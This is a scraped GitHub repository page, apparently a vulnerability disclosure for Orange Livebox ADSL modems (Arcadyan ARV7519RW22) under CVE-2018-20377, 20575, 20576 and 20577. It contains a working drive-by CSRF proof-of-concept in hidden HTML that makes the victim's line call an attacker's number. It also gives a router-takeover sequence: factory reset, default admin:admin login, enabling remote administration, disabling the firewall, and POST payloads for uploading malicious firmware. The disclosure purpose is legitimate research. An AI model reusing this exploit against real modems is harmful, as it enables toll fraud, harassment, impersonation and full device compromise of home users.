Skip to content
Switch branches/tags

Latest commit


Git stats


Failed to load latest commit information.
Latest commit message
Commit time

LIVEBOX-0DAY CVE-2018-20377; 20575; 20576; 20577

Arcadyan ARV7519RW22-A-L T VR9 1.2 Multiple security vulnerabilities affecting latest firmware release on ORANGE Livebox ADSL modems.

Versión de Firmware:  00.96.320S (01.11.2017-11:43:44)
Versión del Boot:  v0.70.03
Versión del Módem ADSL:
Versión de Hardware:  02

CWE-359: Exposure of Private Information ('Privacy Violation'). CVE-2018-20576 Detail

A very serious attack vector allows an attacker to link CSRF drive-by vulnerabilities to exploit Autodialing and Line Test features, succesfully making calls from a victim's line, exposing a client's phone number and making him susceptible to scams and impersonation. Nuisance calls alone are also a serious concern.

Proof of concept exploit:

<!DOCTYPE html>

<!-- Phone number disclosure, reflected call exploit -->


<iframe style="display:none" id="csrf-frame-invisible" name="csrf-frame-invisible"></iframe>
<form style="display:none" method='POST' action='' target="csrf-frame-invisible" name="csrf-form-invisible" id="csrf-form-invisible">
  <input type='hidden' name='autodialing_enable' value='1'>
  <input type='hidden' name='autodialing_number' value='5550150'> <!-- attacker's phone number goes here -->
  <input type='hidden' name='autodialing_timeout' value='0'>
  <input type='submit' value='Submit'>


<img src="" width="0" height="0" border="0">


When the victim visits the malicious site, it will create an autodialing profile on the victim's modem, and activate the Line Test feature. No interaction needed. The phone will ring, and when the call is answered the autodialing feature will call the attacker's number.


Demo Attack scenario
DEMO This vector can be exploited to conduct false flag operations (such as impersonating an individual with a restraint order against another), marketing campaings, harassment, denial of service, and intelligence gathering.


CWE-200: Information Exposure: Unauthenticated configuration information leak. CVE-2018-20377 Detail

The webserver leaks access point security protocol, SSID, and password in plain text.
CVSS v3.0 Severity and Metrics

Base Score: 9.8 CRITICAL
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (V3 legend)
Impact Score: 5.9
Exploitability Score: 3.9

Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

CWE-352: Cross-Site Request Forgery (CSRF): The web application does not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. Allows an attacker to manipulate all configuration parameters. CVE-2018-20577 Detail

Integrity Impact 	Complete. 	(There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the entire system being compromised.)  
Availability Impact 	Complete.	(There is a total shutdown of the affected resource. The attacker can render the resource completely unavailable.)  
Access Complexity 	Low.		(Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. )  
Authentication 		None.		(The vulnerability does not require an attacker or user to be logged into the system).   
User interaction        None.  
- Login with default admin:admin credentials after restoring configuration to factory settings. (This can be omited if the victim has an active session.)
- Change default credentials.
- Enable remote access.
- Upload custom firmware to install remote access malware or brick the system.

POST {empty body} Restores configuration to factory defaults.
POST {empty body} Disables all firewall protections.
POST {IP1=FIRST_OCTET &IP2=SECOND_OCTET &IP3=THIRD_OCTET &IP4=FOURTH_OCTET &r_mgnt_port=_PORT } Allows remote administration. 
POST	{submit_action=0&userNew=admin&userOldPswd=admin&userNewPswd=NEWPASS&userConPswd=NEWPASS&timeout=0} Changes default password.
POST Custom firmware update.

CWE-912: Hidden Functionality. The software contains functionality that is not documented, not part of the specification, and not accessible through an interface or command sequence that is obvious to the software's users or administrators. CVE-2018-20575 Detail

Manual firmware update. Allows malware to be installed as described before.



Media coverage

On December the 21st-2018 a threat actor identified by Troy Mursch's honeypots at BadPackets LLC suspectedly attacked over 19000 vulnerable modems in Spain with the exploits described in this repository. The criminal targeted the Credentials Disclosure (CWE-200) vulnerability and likely employed Access Point geolocation databases such as my own GS-LOC to map the APs.

This project is licensed under the MIT License - see the LICENSE file for details

mapez - telegram


Arcadyan ARV7519RW22-A-L T VR9 1.2 Multiple security vulnerabilities affecting latest firmware release on ORANGE Livebox modems.





No releases published


No packages published